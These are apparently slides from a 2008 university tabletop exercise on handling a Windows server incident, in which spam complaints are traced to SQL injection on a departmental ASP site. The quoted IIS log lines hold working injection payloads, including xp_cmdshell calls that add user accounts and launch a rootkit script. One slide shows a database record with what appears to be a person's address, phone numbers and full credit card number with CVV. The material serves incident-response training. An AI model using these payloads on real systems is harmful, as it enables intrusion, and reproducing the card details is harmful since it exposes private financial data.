Windows Incident Handling Table Top Exercise

January 9, 2008

Policies, Policies, Policies

and Procedures

Information Technology Resource Use Policy 6460cEffective Date: Nov. 3, 1997http://www.boisestate.edu/policy/index.asp?section=6&policynum=6460

Information Privacy and Security Policy 6466aEffective Date: Dec. 22, 2006http://www.boisestate.edu/policy/index.asp?section=6&policynum=6466

Incident Response Procedure Effective Date: Dec. 22, 2006 (under review)http://boisestate.edu/oit/iso/IncidentResponseProcedureBSU.html

Incident Response Policy(under review)http://boisestate.edu/oit/iso/incResponsePolicy.html

Data Classification Standard (under review)http://boisestate.edu/oit/iso/DataClassificationStandardBSU.html

Drafts of IT Policy Available for Commenthttp://boisestate.edu/oit/iso

Events or Incidents?

An event is any observable occurrence in a system or network.

An incident can be thought of as a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices.

--NIST Computer Security Incident Handling Guide (sp800-61)

Incident Handling Process

PreparationAlso—prevention

IdentificationWhat has happened/is happening & why

ContainmentKeep the problem from spreading

EradicationRemove the problem

RecoveryReturn the affected server/service to production

Lessons LearnedDiscuss what went well and not so well to do better next time

Adapted from NIST, SANS, ITIL

Medium Size, pretty well funded college in MRUD

Ten Windows servers, Linux and Mac, too

All Windows servers are 2003 latest SP, current on patches, current and up-to-date AVPart of MRUD AD domain

Some Windows servers are fresh installs, Some are upgrades from Win2k

Six IIS servers

Two IIS servers have FP 2003 extensionsOne FP virtual server for each dept and some associate college and dept activities

Two MS-SQL serversOne SQL server is backend for various home grown dept web applications

Innovative, entrepreneurial facultyUse many student employees and "helpers" to set up web sites and web

applications

>>> David Hawley <xqzme2@mindspring.com> 3/14/2007 9:01 AM >>>

To Whom It May Concern, I recevied the attached sexual spam from someone at your university. I'm letting you know because I sure you do not want your University to be joined in any lawsuit that may come out of this activity. David Hawley

-----Forwarded Message----- From: Noahhornsby@mail.boisestate.edu Sent: Mar 14, 2007 5:54 AM To: Xqzme2 Subject: Greetings !!!

Hello ours dear member!.

Thank you for using our services!Now we represent new unique 2 sites for you.Believe, this site will not leave you cold ! Just exclusive high definition quality video. Only best for you!To your good health and prosperity ! Thanks for attention !

If you love young innocent bodies CLICK HERE.If you love skilled and mature CLICK HERE.

P.S. All our members get free unlimited BONUS ACCESS to many another perfect sites!

not sure what to do with this...

From: Average UserTo: helpdesk@boisestate.edu Date: 5/10/2007 10:19 AMSubject: Fwd: Illegal content

This email does not look like it came from a reliable source. We did not open the links and are deleting this but I thought it would be good to forward on to OIT.

Thanks,

Average

From: "Uwe Packer" <nurmist@hotmail.com>To: <bweb@boisestate.edu>, <regmail@boisestate.edu>, <auser@boisestate.edu>Date: 5/9/2007 10:34 PMSubject: Illegal content

Unfortunately I have to report that your IT services are being misused for spamming and drug sales. Would you please upgrade your security and stop this content from being distributed to minors.

Uwe

Sample post received:May 10, 2007 at 05:22:18 propecia (qtk092yvxyc@pochta.com)http://modlang.boisestate.edu/_s297board/000009a5.htm

Hi! propecia [url=http://modlang.boisestate.edu/_s297board/000009a5.htm]propecia[/url] Welcome!

===

May 10, 2007 at 02:04:31 Tadalafil (7ejtf8@yahoo.com)http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil

Hi! tadalafil as [url=http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil]tadalafil as[/url] Waiting for you!

_________________________________________________________________Advertisement: 1000s of Sexy Singles online now at Lavalife - Click here http://a.ninemsn.com.au/b.aspx?URL=http%3A%2F%2Flavalife9%2Eninemsn%2Ecom%2Eau%2Fclickthru%2Fclickthru%2Eact%3Fid%3Dninemsn%26context%3Dan99%26locale%3Den%5FAU%26a%3D27782&_t=762255081&_r=lavalife_may07_1000sexysingles&_m=EXT

From: Help DeskTo: User, AverageDate: 5/10/2007 11:02 AMSubject: Re: Fwd: Illegal content

Hi Average,

Yes, this is a spam email. Please delete. In the future you may also forward spam emails as attachments to spam@boisestate.edu

Thank you,

Techy

From: Simon Brady <simon@hikari.org.nz>To: <abuse@modlang.boisestate.edu>Date: 5/13/2007 4:12 AMSubject: Compromised Boise State website

Hi folks,

A web bulletin board run by your Modern Languages and Literatures Faculty appears to have been taken oven by spammers:

http://modlang.boisestate.edu/s297board_frm.htm

Could you please pass this on to your IT security staff?

Thanks,Simon

Site is a web forum that anyone can post to.... no username/ passowrd required.Main site: http://modlang.boisestate.edu/webspanish/s297boardhome.htmThe main modlang site does not even seem to have a link to this forum so I'm not sure how someone would navigate to it... but all the same there are several posts from the last few days that have inappropriate wording.

TuesdayWednesday

ThursdayFriday

0

20

40

60

80

100

120

Noon

6:00 p

6:00 a

> From: "ernie nicholas" <ernnich@gmail.com>> Date: June 4, 2007 12:17:41 PM MDT> To: abuse@malville.boisestate.edu > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr >> thanks

> From: "john smith" <johnsmith666@gmail.com>> Date: June 8, 2007 12:17:41 PM MDT> To: abuse@malville.boisestate.edu > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy >> thanks**********************************************> From: "bob carol" <bcarol@gmail.com>> Date: June 10, 2007 2:27:31 AM MDT> To: abuse@malville.boisestate.edu > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=bzvetcps>> thanks***********************************************> From: "ted nalice" <tednalice@gmail.com>> Date: June 14, 2007 11:12:45 PM MDT> To: abuse@malville.boisestate.edu > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr >> thanks

2007-05-18 18:36:44 132.178.236.60 GET /malville/maincontent.asp page=Policies'%3BINSERT+INTO+OTHERPAGES+(PAGE,CONTENT)+VALUES+(CHAR(117)%2BCHAR(104)%2BCHAR(108)%2BCHAR(102)%2BCHAR(102)%2BCHAR(109)%2BCHAR(104)%2BCHAR(121),SPACE(0))%2D%2D 80 - 83.222.16.60 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0

This Translates to a SQL insert command loading an entry and a script, “uhlffmhy” in the “OtherPages” table. Then, a URL like this

http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy

redirects to an on-line pharmaceutical site.

2007-05-21 09:24:11 132.178.236.60 GET /malville/maincontent.asp page=bzvetcps' and 1=1;declare @cmd varÐset @cmd = start wscript upwroot.vbs //BEXEC MASTER..XP_CMDSHELL @cmd;-- and '1'='1 80 - 202.96.182.225 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506) 200 0 0

This injection used the Malville database to upload and run a Visual Basic script that installed a rootkit after running 11 previous SQL commands to prepare the database for the script. Symantec Anti-virus did not mark or alert on the trojan programs installed by the rootkit. The rootkit then allowed remote access to the server.

2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr%27%3B%44%72%6F%70%20%74%61%62%6C%65%20%63%6F%6D%64%5F%6C%69%73%74%20%3B%43%52%45%41%54%45%20%54%41%42%4C%45%20%63%6F%6D%64%5F%6C%69%73%74%20%28%43%6F%6D%52%65%73%75%6C%74%20%6E%76%61%72%63%68%61%72%28%31%30%30%30%29%29%20%49%4E%53%45%52%54%20%63%6F%6D%64%5F%6C%69%73%74%20%45%58%45%43%20%4D%41%53%54%45%52%2E%2E%78%70%5F%63%6D%64%73%68%65%6C%6C%20%22%6E%65%74%20%75%73%65%72%20%72%6F%79%20%31%32%33%20%2F%61%64%64%22%2D%2D 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0 0

2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr';Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell "net user roy 123 /add"-- 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0

Mix of text and hex sent to the database:

2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE%20TABLE%20[X_6691]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL);insert%20into%20[X_6691](ResultTxt)%20exec%20master..xp_cmdshell%20'net%20user%20iisadmin%20admin%20/add';insert%20into%20[X_6691]%20values%20('g_over');exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64

Translated:

2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE TABLE [X_6691]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_6691](ResultTxt) exec master..xp_cmdshell 'net user iisadmin admin /add';insert into [X_6691] values ('g_over');exec master..sp_dropextendedproc 'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64

How did this happen?

Still, attacker shouldn't have gotten as far as he/she did!

Just a faculty member's pet project.

Tables in the Malville Database:

The usual system tables and:

ChecklistCrossReferencesFeedbackOtherPagesContributors

For display purposes, these rows from the Contributors table are displayed as columns

id 500name Thomas Smithaddress 1492 Columbus Dr.city Hopestate IDzip 83666hphone 2088769821posit Marketing Directorempl Coldwater Creekwphone 2088353009email tsmith22@yahoo.comsource phoneDriveamount 750cc mcccname Thomas L. Smithccnum 4857349832681896ccexp 10/10/2010cvv 430alum yesassn yesgyear 1993degree BSmajor mktFinspouse Mary

OK! You've identified the problem. How do you keep it from getting worse?

How do you remove the pestilence?

How and when do you get the server back in business?

Time to go home!

Thanks!